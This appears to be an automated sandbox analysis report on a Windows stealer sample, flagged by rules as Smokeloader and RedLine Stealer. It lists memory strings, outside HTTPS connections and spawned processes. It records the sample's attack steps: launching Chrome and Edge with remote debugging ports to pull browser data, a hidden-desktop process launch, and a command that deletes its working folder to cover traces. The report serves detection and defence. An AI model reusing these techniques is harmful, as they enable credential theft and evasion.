          Source: chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/$
          Source: chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/.
          Source: chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/1
          Source: chrome.exe, 0000000A.00000003.1467152733.000014100039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1519626664.000014100080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1466717994.0000141000390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
          Source: chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/5
          Source: chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/8
          Source: chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/;
          Source: chrome.exe, 0000000A.00000003.1467390436.0000141000684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/gj
          Source: chrome.exe, 0000000A.00000002.1551249243.000014100078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1467390436.0000141000684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
          Source: chrome.exe, 0000000A.00000003.1467152733.000014100039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1519626664.000014100080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1466717994.0000141000390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
          Source: chrome.exe, 0000000A.00000003.1467390436.0000141000684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
          Source: chrome.exe, 0000000A.00000003.1467390436.0000141000684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
          Source: chrome.exe, 0000000A.00000002.1551249243.000014100078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1468528535.00001410006E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
          Source: chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
          Source: chrome.exe, 0000000A.00000003.1467152733.000014100039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1519626664.000014100080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1466717994.0000141000390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
          Source: msedge.exe, 0000000D.00000002.1683914101.00003998025A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
          Source: chrome.exe, 0000000A.00000002.1560753957.00007824023C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/googleapis.com
          Source: chrome.exe, 0000000A.00000002.1562688391.00007824027EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
          Source: chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
          Source: chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
          Source: AIWTJM.0.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
          Source: msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
          Source: chrome.exe, 0000000A.00000002.1562165163.0000782402681000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563061355.0000782402878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1567048584.0000782403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563661455.0000782402988000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
          Source: chrome.exe, 0000000A.00000002.1562165163.0000782402681000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563061355.0000782402878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1567048584.0000782403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563661455.0000782402988000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
          Source: chrome.exe, 0000000A.00000002.1550016156.0000141000238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
          Source: chrome.exe, 0000000A.00000002.1550016156.0000141000238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
          Source: chrome.exe, 0000000A.00000003.1467152733.000014100039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1519626664.000014100080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1466717994.0000141000390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
          Source: chrome.exe, 0000000A.00000003.1467152733.000014100039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1519626664.000014100080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1466717994.0000141000390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
          Source: chrome.exe, 0000000A.00000002.1551143344.0000141000770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
          Source: chrome.exe, 0000000A.00000003.1518301441.0000782403B7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1518719809.0000782403B80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1518814424.0000782403B84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardx$
          Source: chrome.exe, 0000000A.00000003.1466717994.0000141000390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
          Source: chrome.exe, 0000000A.00000002.1561929136.000078240260C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1529339632.0000782403DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1527407229.0000782403534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1536160994.0000782403F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1532379200.0000782403E4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1531865338.0000782403E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1527160907.0000782403E30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
          Source: chrome.exe, 0000000A.00000003.1487803754.000078240340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487524446.00007824026C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487654825.0000782403268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
          Source: chrome.exe, 0000000A.00000003.1487803754.000078240340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487524446.00007824026C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487654825.0000782403268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
          Source: chrome.exe, 0000000A.00000003.1468528535.00001410006E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
          Source: chrome.exe, 0000000A.00000003.1466717994.0000141000390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
          Source: chrome.exe, 0000000A.00000002.1551249243.000014100078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
          Source: chrome.exe, 0000000A.00000002.1551249243.000014100078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918
          Source: chrome.exe, 0000000A.00000002.1551077437.0000141000744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
          Source: chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
          Source: chrome.exe, 0000000A.00000002.1560753957.00007824023C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
          Source: chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.office.com
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
          Source: chrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
          Source: chrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
          Source: chrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
          Source: chrome.exe, 0000000A.00000002.1561375774.00007824024C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
          Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49700 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.7:49701 version: TLS 1.2
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe Code function: 0_2_0040AB8F memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcpyA,lstrcpyA,CreateProcessA,Sleep,CloseDesktop

          System Summary

          Source: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 00000000.00000002.2205131048.0000000000A29000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe Code function: 0_2_00409EF0
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe Code function: 0_2_0040996B
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe Code function: 0_2_00420040
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe Code function: 0_2_0041D627
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe Code function: 0_2_0041F3CD
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe Code function: 0_2_009CD88E
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe Code function: 0_2_009D02A7
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe Code function: 0_2_009CC201
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe Code function: 0_2_009CF634
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe Code function: 0_2_009B5D92
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe Code function: 0_2_009B9BD2
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe Code function: 0_2_009C0937
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe Code function: 0_2_009BA157
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 3064
          Source: dZKPE9gotO.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 00000000.00000002.2205131048.0000000000A29000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: dZKPE9gotO.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@69/287@22/18
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe Code function: 0_2_004152A5 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\90QIEYSH.htm
          Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2000
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8340:120:WilError_03
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe File created: C:\Users\user~1\AppData\Local\Temp\287b9929-2388-40f9-a4b3-c1eacd0c33aa.tmp
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: chrome.exe, 0000000A.00000002.1563239627.00007824028E5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
          Source: SJMO89RQI.0.dr, KXLFU3OHD.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: dZKPE9gotO.exe ReversingLabs: Detection: 76%
          Source: unknown Process created: C:\Users\user\Desktop\dZKPE9gotO.exe "C:\Users\user\Desktop\dZKPE9gotO.exe"
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2844 --field-trial-handle=2300,i,8023448813731883458,15502527329942083747,262144 /prefetch:8
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2716 --field-trial-handle=2484,i,735169175553116458,11203760071663771088,262144 /prefetch:3
          Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:3
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6260 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6552 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\PP89HLXLFCBI" & exit
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6704 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\PP89HLXLFCBI" & exitJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2844 --field-trial-handle=2300,i,8023448813731883458,15502527329942083747,262144 /prefetch:8Jump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2716 --field-trial-handle=2484,i,735169175553116458,11203760071663771088,262144 /prefetch:3Jump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:3Jump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6260 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8Jump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6552 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8Jump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
